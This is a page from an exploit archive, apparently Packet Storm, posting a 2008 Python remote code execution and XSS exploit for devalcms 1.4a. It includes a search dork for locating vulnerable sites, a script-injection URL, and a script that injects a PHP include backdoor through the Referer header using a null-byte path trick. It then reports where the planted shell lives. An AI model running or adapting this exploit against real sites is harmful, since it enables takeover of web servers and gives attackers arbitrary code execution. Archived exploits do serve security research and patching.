exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

devalcms-xssexec.txt

devalcms-xssexec.txt
Posted Sep 5, 2008
Authored by IRCRASH | Site ircrash.com

devalcms version 1.4a cross site scripting and remote code execution exploit.

tags | exploit, remote, code execution, xss
SHA-256 | b27142b83dc472b62ff380ed0871002636997c4c8316a919f6bc4a98c1f9790c

devalcms-xssexec.txt

Change Mirror Download
#!/usr/bin/python
#####################################################################################
#### devalcms v1.4a Remote Code Execution Exploit / Xss ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://www.sourceforge.net/projects/devalcms #
# #
#DORK : "powered by devalcms v1.4.a" #
# #
#####################################################################################
# [Xss] #
# #
#http://Site/[path]/index.php?currentpath=<script>alert('Xss')</script> #
# #
#####################################################################################
# #
# [Remote Code Execution] #
# #
#Use this exploit for remote code execution valun . #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
import sys,socket
argv=sys.argv
data='<?php include $_GET[\'evil\']; ?>'
query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00'
if len(argv) < 3 :
print '[*]Devalcms v1.4.a Remote code execut exploit'
print '[*]Dork : powered by devalcms v1.4.a'
print '[*]Powered by : R3d.W0rm'
print '[*]Our Site : http://ircrash.com'
print '[*]Usage : ' + argv[0] + ' site /path'
exit()
if 'http://' in argv[1] :
target=argv[1].replace('http://','')
else :
target=argv[1]
if '/' in argv[2] :
path=argv[2]
else :
path='/' + argv[2]
print '[*]Devalcms v1.4.a Remote code execut exploit'
print '[*]Powered by : R3d.W0rm'
print '[*]Our Site : http://ircrash.com'
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target,80))
sock.send("GET " + path + query + " HTTP/1.1\n")
sock.send("Host: " + target + "\n")
sock.send("Referer: " + data + "\n\n\n")
recv=sock.recv(2048)
if 'HTTP/1.1 200 OK' in recv :
print '[+]Code injected .'
print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php'
else :
print '[-]Can not inject code.'
exit()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close